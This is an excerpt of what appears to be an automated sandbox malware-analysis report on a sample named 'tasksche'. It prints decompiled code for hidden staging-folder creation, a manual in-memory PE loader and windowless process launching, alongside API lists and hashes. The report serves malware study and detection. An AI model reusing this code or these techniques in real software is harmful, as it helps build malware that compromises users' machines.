                                                                                                                                                0x00401c70
                                                                                                                                                0x00401c38
                                                                                                                                                0x00401c3a
                                                                                                                                                0x00000000
                                                                                                                                                0x00401c8f
                                                                                                                                                0x00401c97
                                                                                                                                                0x00401cb2
                                                                                                                                                0x00401cbf
                                                                                                                                                0x00401cc4
                                                                                                                                                0x00401cd6
                                                                                                                                                0x00401ce0
                                                                                                                                                0x00000000
                                                                                                                                                0x00401ce2
                                                                                                                                                0x00401c70
                                                                                                                                                0x00401c2c
                                                                                                                                                0x00401c31
                                                                                                                                                0x00401c36
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                                                                                                                                                • swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00401C10
                                                                                                                                                • swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
                                                                                                                                                • wcsrchr.MSVCRT(?,0000005C), ref: 00401CAC
                                                                                                                                                • wcsrchr.MSVCRT(?,0000005C), ref: 00401CBD
                                                                                                                                                  • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                                                                                                                                                  • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                                                                                                                                                  • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                                                                                                                                                  • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Directory$CreateCurrentswprintfwcsrchr$AttributesByteCharFileMultiPathTempWideWindows
                                                                                                                                                • String ID: %s\Intel$%s\ProgramData
                                                                                                                                                • API String ID: 3806094219-198707228
                                                                                                                                                • Opcode ID: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                                                                                                                                                • Instruction ID: 4ac525b1174630586dc3f01422198d44c3eaba501bd80531e66e43f198221a67
                                                                                                                                                • Opcode Fuzzy Hash: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                                                                                                                                                • Instruction Fuzzy Hash: 2C41447294021DAAEF609BA0DD45FDA777CAF04310F1045BBE608F71E0EA74DA888F59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004021E9 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 233memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                			E004021E9(void* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32) {
				signed int _v8;
				intOrPtr _v40;
				char _v44;
				void* _t82;
				struct HINSTANCE__* _t83;
				intOrPtr* _t84;
				intOrPtr _t89;
				void* _t91;
				void* _t104;
				void _t107;
				intOrPtr _t116;
				intOrPtr _t124;
				signed int _t125;
				signed char _t126;
				intOrPtr _t127;
				signed int _t134;
				intOrPtr* _t145;
				signed int _t146;
				intOrPtr* _t151;
				intOrPtr _t152;
				short* _t153;
				signed int _t155;
				void* _t156;
				intOrPtr _t157;
				void* _t158;
				void* _t159;
				void* _t160;

				_v8 = _v8 & 0x00000000;
				_t3 =  &_a8; // 0x40213f
				if(E00402457( *_t3, 0x40) == 0) {
					L37:
					return 0;
				}
				_t153 = _a4;
				if( *_t153 == 0x5a4d) {
					if(E00402457(_a8,  *((intOrPtr*)(_t153 + 0x3c)) + 0xf8) == 0) {
						goto L37;
					}
					_t151 =  *((intOrPtr*)(_t153 + 0x3c)) + _t153;
					if( *_t151 != 0x4550 ||  *((short*)(_t151 + 4)) != 0x14c) {
						goto L2;
					} else {
						_t9 = _t151 + 0x38; // 0x68004021
						_t126 =  *_t9;
						if((_t126 & 0x00000001) != 0) {
							goto L2;
						}
						_t12 = _t151 + 0x14; // 0x4080e415
						_t13 = _t151 + 6; // 0x4080e0
						_t146 =  *_t13 & 0x0000ffff;
						_t82 = ( *_t12 & 0x0000ffff) + _t151 + 0x18;
						if(_t146 <= 0) {
							L16:
							_t83 = GetModuleHandleA("kernel32.dll");
							if(_t83 == 0) {
								goto L37;
							}
							_t84 = _a24(_t83, "GetNativeSystemInfo", 0);
							_t159 = _t158 + 0xc;
							if(_t84 == 0) {
								goto L37;
							}
							 *_t84( &_v44);
							_t86 = _v40;
							_t23 = _t151 + 0x50; // 0xec8b55c3
							_t25 = _t86 - 1; // 0xec8b55c2
							_t27 = _t86 - 1; // -1
							_t134 =  !_t27;
							_t155 =  *_t23 + _t25 & _t134;
							if(_t155 != (_v40 + _v8 - 0x00000001 & _t134)) {
								goto L2;
							}
							_t31 = _t151 + 0x34; // 0x85680040
							_t89 = _a12( *_t31, _t155, 0x3000, 4, _a32);
							_t127 = _t89;
							_t160 = _t159 + 0x14;
							if(_t127 != 0) {
								L21:
								_t91 = HeapAlloc(GetProcessHeap(), 8, 0x3c);
								_t156 = _t91;
								if(_t156 != 0) {
									 *((intOrPtr*)(_t156 + 4)) = _t127;
									_t38 = _t151 + 0x16; // 0xc3004080
									 *(_t156 + 0x14) =  *_t38 >> 0x0000000d & 0x00000001;
									 *((intOrPtr*)(_t156 + 0x1c)) = _a12;
									 *((intOrPtr*)(_t156 + 0x20)) = _a16;
									 *((intOrPtr*)(_t156 + 0x24)) = _a20;
									 *((intOrPtr*)(_t156 + 0x28)) = _a24;
									 *((intOrPtr*)(_t156 + 0x2c)) = _a28;
									 *((intOrPtr*)(_t156 + 0x30)) = _a32;
									 *((intOrPtr*)(_t156 + 0x38)) = _v40;
									_t54 = _t151 + 0x54; // 0x8328ec83
									if(E00402457(_a8,  *_t54) == 0) {
										L36:
										E004029CC(_t156);
										goto L37;
									}
									_t57 = _t151 + 0x54; // 0x8328ec83
									_t104 = _a12(_t127,  *_t57, 0x1000, 4, _a32);
									_t59 = _t151 + 0x54; // 0x8328ec83
									_a32 = _t104;
									memcpy(_t104, _a4,  *_t59);
									_t107 =  *((intOrPtr*)(_a4 + 0x3c)) + _a32;
									 *_t156 = _t107;
									 *((intOrPtr*)(_t107 + 0x34)) = _t127;
									if(E00402470(_a4, _a8, _t151, _t156) == 0) {
										goto L36;
									}
									_t68 = _t151 + 0x34; // 0x85680040
									_t111 =  *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68;
									if( *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68) {
										_t152 = 1;
										 *((intOrPtr*)(_t156 + 0x18)) = _t152;
									} else {
										 *((intOrPtr*)(_t156 + 0x18)) = E00402758(_t156, _t111);
										_t152 = 1;
									}
									if(E004027DF(_t156) != 0 && E0040254B(_t156) != 0 && E0040271D(_t156) != 0) {
										_t116 =  *((intOrPtr*)( *_t156 + 0x28));
										if(_t116 == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = 0;
											L41:
											return _t156;
										}
										if( *(_t156 + 0x14) == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = _t116 + _t127;
											goto L41;
										}
										_push(0);
										_push(_t152);
										_push(_t127);
										if( *((intOrPtr*)(_t116 + _t127))() != 0) {
											 *((intOrPtr*)(_t156 + 0x10)) = _t152;
											goto L41;
										}
										SetLastError(0x45a);
									}
									goto L36;
								}
								_a16(_t127, _t91, 0x8000, _a32);
								L23:
								SetLastError(0xe);
								L3:
								goto L37;
							}
							_t127 = _a12(_t89, _t155, 0x3000, 4, _a32);
							_t160 = _t160 + 0x14;
							if(_t127 == 0) {
								goto L23;
							}
							goto L21;
						}
						_t145 = _t82 + 0xc;
						do {
							_t157 =  *((intOrPtr*)(_t145 + 4));
							_t124 =  *_t145;
							if(_t157 != 0) {
								_t125 = _t124 + _t157;
							} else {
								_t125 = _t124 + _t126;
							}
							if(_t125 > _v8) {
								_v8 = _t125;
							}
							_t145 = _t145 + 0x28;
							_t146 = _t146 - 1;
						} while (_t146 != 0);
						goto L16;
					}
				}
				L2:
				SetLastError(0xc1);
				goto L3;
			}






























                                                                                                                                                0x004021ef
                                                                                                                                                0x004021f8
                                                                                                                                                0x00402204
                                                                                                                                                0x0040243d
                                                                                                                                                0x00000000
                                                                                                                                                0x0040243d
                                                                                                                                                0x0040220a
                                                                                                                                                0x00402212
                                                                                                                                                0x00402239
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00402242
                                                                                                                                                0x0040224a
                                                                                                                                                0x00000000
                                                                                                                                                0x00402254
                                                                                                                                                0x00402254
                                                                                                                                                0x00402254
                                                                                                                                                0x0040225a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040225c
                                                                                                                                                0x00402260
                                                                                                                                                0x00402260
                                                                                                                                                0x00402266
                                                                                                                                                0x0040226a
                                                                                                                                                0x0040228c
                                                                                                                                                0x00402291
                                                                                                                                                0x00402299
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004022a7
                                                                                                                                                0x004022aa
                                                                                                                                                0x004022af
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004022b9
                                                                                                                                                0x004022bb
                                                                                                                                                0x004022be
                                                                                                                                                0x004022c1
                                                                                                                                                0x004022c8
                                                                                                                                                0x004022cb
                                                                                                                                                0x004022d1
                                                                                                                                                0x004022d7
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004022e8
                                                                                                                                                0x004022eb
                                                                                                                                                0x004022ee
                                                                                                                                                0x004022f0
                                                                                                                                                0x004022f5
                                                                                                                                                0x0040230f
                                                                                                                                                0x0040231a
                                                                                                                                                0x00402320
                                                                                                                                                0x00402324
                                                                                                                                                0x0040233d
                                                                                                                                                0x00402340
                                                                                                                                                0x0040234a
                                                                                                                                                0x00402350
                                                                                                                                                0x00402356
                                                                                                                                                0x0040235c
                                                                                                                                                0x00402362
                                                                                                                                                0x00402368
                                                                                                                                                0x0040236e
                                                                                                                                                0x00402374
                                                                                                                                                0x00402377
                                                                                                                                                0x00402386
                                                                                                                                                0x00402436
                                                                                                                                                0x00402437
                                                                                                                                                0x00000000
                                                                                                                                                0x0040243c
                                                                                                                                                0x00402396
                                                                                                                                                0x0040239a
                                                                                                                                                0x0040239d
                                                                                                                                                0x004023a0
                                                                                                                                                0x004023a7
                                                                                                                                                0x004023ba
                                                                                                                                                0x004023bc
                                                                                                                                                0x004023bf
                                                                                                                                                0x004023cc
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004023d3
                                                                                                                                                0x004023d3
                                                                                                                                                0x004023d6
                                                                                                                                                0x004023eb
                                                                                                                                                0x004023ec
                                                                                                                                                0x004023d8
                                                                                                                                                0x004023e0
                                                                                                                                                0x004023e6
                                                                                                                                                0x004023e6
                                                                                                                                                0x004023f8
                                                                                                                                                0x00402414
                                                                                                                                                0x00402419
                                                                                                                                                0x0040244d
                                                                                                                                                0x00402450
                                                                                                                                                0x00000000
                                                                                                                                                0x00402450
                                                                                                                                                0x0040241e
                                                                                                                                                0x00402448
                                                                                                                                                0x00000000
                                                                                                                                                0x00402448
                                                                                                                                                0x00402420
                                                                                                                                                0x00402421
                                                                                                                                                0x00402424
                                                                                                                                                0x00402429
                                                                                                                                                0x00402441
                                                                                                                                                0x00000000
                                                                                                                                                0x00402441
                                                                                                                                                0x00402430
                                                                                                                                                0x00402430
                                                                                                                                                0x00000000
                                                                                                                                                0x004023f8
                                                                                                                                                0x00402330
                                                                                                                                                0x00402336
                                                                                                                                                0x00402219
                                                                                                                                                0x00402219
                                                                                                                                                0x00000000
                                                                                                                                                0x00402219
                                                                                                                                                0x00402306
                                                                                                                                                0x00402308
                                                                                                                                                0x0040230d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040230d
                                                                                                                                                0x0040226c
                                                                                                                                                0x0040226f
                                                                                                                                                0x0040226f
                                                                                                                                                0x00402272
                                                                                                                                                0x00402276
                                                                                                                                                0x0040227c
                                                                                                                                                0x00402278
                                                                                                                                                0x00402278
                                                                                                                                                0x00402278
                                                                                                                                                0x00402281
                                                                                                                                                0x00402283
                                                                                                                                                0x00402283
                                                                                                                                                0x00402286
                                                                                                                                                0x00402289
                                                                                                                                                0x00402289
                                                                                                                                                0x00000000
                                                                                                                                                0x0040226f
                                                                                                                                                0x0040224a
                                                                                                                                                0x00402214
                                                                                                                                                0x00402219
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?!@,00000040,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402463
                                                                                                                                                • SetLastError.KERNEL32(000000C1,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402219
                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402291
                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000003C,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2), ref: 00402313
                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 0040231A
                                                                                                                                                • memcpy.MSVCRT(00000000,?,8328EC83,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3), ref: 004023A7
                                                                                                                                                  • Part of subcall function 00402470: memset.MSVCRT(?,00000000,?), ref: 004024D5
                                                                                                                                                • SetLastError.KERNEL32(0000045A), ref: 00402430
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$Heap$AllocHandleModuleProcessmemcpymemset
                                                                                                                                                • String ID: ?!@$GetNativeSystemInfo$kernel32.dll
                                                                                                                                                • API String ID: 1900561814-3657104962
                                                                                                                                                • Opcode ID: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                                                                                                                                                • Instruction ID: 3b750285519b5b92c664dbe57bf04ddc7e4262fbacbc213f0015b22f99412f1c
                                                                                                                                                • Opcode Fuzzy Hash: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                                                                                                                                                • Instruction Fuzzy Hash: 0A81AD71A01602AFDB209FA5CE49AAB77E4BF08314F10443EF945E76D1D7B8E851CB98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401AF6 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                			E00401AF6(WCHAR* _a4, WCHAR* _a8, wchar_t* _a12) {
				void* _t15;
				WCHAR* _t17;

				CreateDirectoryW(_a4, 0);
				if(SetCurrentDirectoryW(_a4) == 0) {
					L2:
					return 0;
				}
				_t17 = _a8;
				CreateDirectoryW(_t17, 0);
				if(SetCurrentDirectoryW(_t17) != 0) {
					SetFileAttributesW(_t17, GetFileAttributesW(_t17) | 0x00000006);
					if(_a12 != 0) {
						_push(_t17);
						swprintf(_a12, L"%s\\%s", _a4);
					}
					_t15 = 1;
					return _t15;
				}
				goto L2;
			}





                                                                                                                                                0x00401b07
                                                                                                                                                0x00401b16
                                                                                                                                                0x00401b27
                                                                                                                                                0x00000000
                                                                                                                                                0x00401b27
                                                                                                                                                0x00401b18
                                                                                                                                                0x00401b1e
                                                                                                                                                0x00401b25
                                                                                                                                                0x00401b36
                                                                                                                                                0x00401b40
                                                                                                                                                0x00401b42
                                                                                                                                                0x00401b4e
                                                                                                                                                0x00401b54
                                                                                                                                                0x00401b59
                                                                                                                                                0x00000000
                                                                                                                                                0x00401b59
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00401B2C
                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00401B36
                                                                                                                                                • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401B4E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Directory$AttributesCreateCurrentFile$swprintf
                                                                                                                                                • String ID: %s\%s
                                                                                                                                                • API String ID: 1036847564-4073750446
                                                                                                                                                • Opcode ID: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                                                                                                                                                • Instruction ID: 4a0a9b6f0974b2b783bf1fd4f993800d593798a72c4fd06372b86497b3864b36
                                                                                                                                                • Opcode Fuzzy Hash: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                                                                                                                                                • Instruction Fuzzy Hash: 99F06271200208BBEB103F65DE44F9B3B2CEB457A5F015832FA46B61A1DB75A855CAB8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401064 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63processsynchronizationCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                			E00401064(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t32;
				intOrPtr _t37;

				_t32 = 0x10;
				_v88.cb = 0x44;
				memset( &(_v88.lpReserved), 0, _t32 << 2);
				_v20.hProcess = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t37 = 1;
				_v88.wShowWindow = 0;
				_v88.dwFlags = _t37;
				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20) == 0) {
					return 0;
				}
				if(_a8 != 0) {
					if(WaitForSingleObject(_v20.hProcess, _a8) != 0) {
						TerminateProcess(_v20.hProcess, 0xffffffff);
					}
					if(_a12 != 0) {
						GetExitCodeProcess(_v20.hProcess, _a12);
					}
				}
				CloseHandle(_v20);
				CloseHandle(_v20.hThread);
				return _t37;
			}







                                                                                                                                                0x00401070
                                                                                                                                                0x00401074
                                                                                                                                                0x0040107d
                                                                                                                                                0x00401082
                                                                                                                                                0x00401085
                                                                                                                                                0x00401086
                                                                                                                                                0x00401087
                                                                                                                                                0x0040108d
                                                                                                                                                0x0040108e
                                                                                                                                                0x004010a1
                                                                                                                                                0x004010b0
                                                                                                                                                0x00000000
                                                                                                                                                0x004010f7
                                                                                                                                                0x004010b5
                                                                                                                                                0x004010c5
                                                                                                                                                0x004010cc
                                                                                                                                                0x004010cc
                                                                                                                                                0x004010d5
                                                                                                                                                0x004010dd
                                                                                                                                                0x004010dd
                                                                                                                                                0x004010d5
                                                                                                                                                0x004010ec
                                                                                                                                                0x004010f1
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 004010A8
                                                                                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 004010BD
                                                                                                                                                • TerminateProcess.KERNEL32(?,000000FF), ref: 004010CC
                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 004010DD
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004010EC
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004010F1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                                                                                                                                • String ID: D
                                                                                                                                                • API String ID: 786732093-2746444292
                                                                                                                                                • Opcode ID: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                                                                                                                                                • Instruction ID: fabf2a0aaa91e867d54492d1ca24e81fc8ed090543e33b3e61fa812da4358066
                                                                                                                                                • Opcode Fuzzy Hash: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                                                                                                                                                • Instruction Fuzzy Hash: 8D116431900229ABDB218F9ADD04ADFBF79FF04720F008426F514B65A0DB708A18DAA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004077BA Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40d488);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x40f94c =  *0x40f94c | 0xffffffff;
				 *0x40f950 =  *0x40f950 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x40f948; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x40f944; // 0x0
				 *_t24 = _t47;
				 *0x40f954 = _adjust_fdiv;
				_t27 = E0040793F( *_adjust_fdiv);
				_t61 =  *0x40f870; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E0040793C);
				}
				E0040792A(_t27);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t29 =  *0x40f940; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40f93c,  &_v112);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while(1) {
						__eflags =  *_t55 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				L7:
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t69 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = L00401FE7(_t69, GetModuleHandleA(0), 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0040791E();
				return _t41;
			}





























                                                                                                                                                0x004077bd
                                                                                                                                                0x004077bf
                                                                                                                                                0x004077c4
                                                                                                                                                0x004077cf
                                                                                                                                                0x004077d0
                                                                                                                                                0x004077dd
                                                                                                                                                0x004077e2
                                                                                                                                                0x004077e7
                                                                                                                                                0x004077ee
                                                                                                                                                0x004077f5
                                                                                                                                                0x004077fc
                                                                                                                                                0x00407802
                                                                                                                                                0x00407808
                                                                                                                                                0x0040780a
                                                                                                                                                0x00407810
                                                                                                                                                0x00407816
                                                                                                                                                0x0040781f
                                                                                                                                                0x00407824
                                                                                                                                                0x00407829
                                                                                                                                                0x0040782f
                                                                                                                                                0x00407836
                                                                                                                                                0x0040783c
                                                                                                                                                0x0040783d
                                                                                                                                                0x00407842
                                                                                                                                                0x00407847
                                                                                                                                                0x0040784c
                                                                                                                                                0x00407851
                                                                                                                                                0x00407856
                                                                                                                                                0x0040786f
                                                                                                                                                0x00407875
                                                                                                                                                0x0040787a
                                                                                                                                                0x0040787f
                                                                                                                                                0x0040788c
                                                                                                                                                0x0040788e
                                                                                                                                                0x00407894
                                                                                                                                                0x004078d0
                                                                                                                                                0x004078d0
                                                                                                                                                0x004078d3
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004078d5
                                                                                                                                                0x004078d6
                                                                                                                                                0x004078d6
                                                                                                                                                0x00407896
                                                                                                                                                0x00407896
                                                                                                                                                0x00407896
                                                                                                                                                0x00407897
                                                                                                                                                0x0040789a
                                                                                                                                                0x0040789c
                                                                                                                                                0x004078a7
                                                                                                                                                0x004078a9
                                                                                                                                                0x004078a9
                                                                                                                                                0x004078aa
                                                                                                                                                0x004078aa
                                                                                                                                                0x004078a7
                                                                                                                                                0x004078ad
                                                                                                                                                0x004078ad
                                                                                                                                                0x004078b1
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004078b7
                                                                                                                                                0x004078be
                                                                                                                                                0x004078c4
                                                                                                                                                0x004078c8
                                                                                                                                                0x004078dd
                                                                                                                                                0x004078ca
                                                                                                                                                0x004078ca
                                                                                                                                                0x004078ca
                                                                                                                                                0x004078e9
                                                                                                                                                0x004078ee
                                                                                                                                                0x004078f2
                                                                                                                                                0x004078f8
                                                                                                                                                0x004078fd
                                                                                                                                                0x004078ff
                                                                                                                                                0x00407902
                                                                                                                                                0x00407903
                                                                                                                                                0x00407904
                                                                                                                                                0x0040790b

                                                                                                                                                APIs
                                                                                                                                                • __set_app_type.MSVCRT(00000002), ref: 004077E7
                                                                                                                                                • __p__fmode.MSVCRT ref: 004077FC
                                                                                                                                                • __p__commode.MSVCRT ref: 0040780A
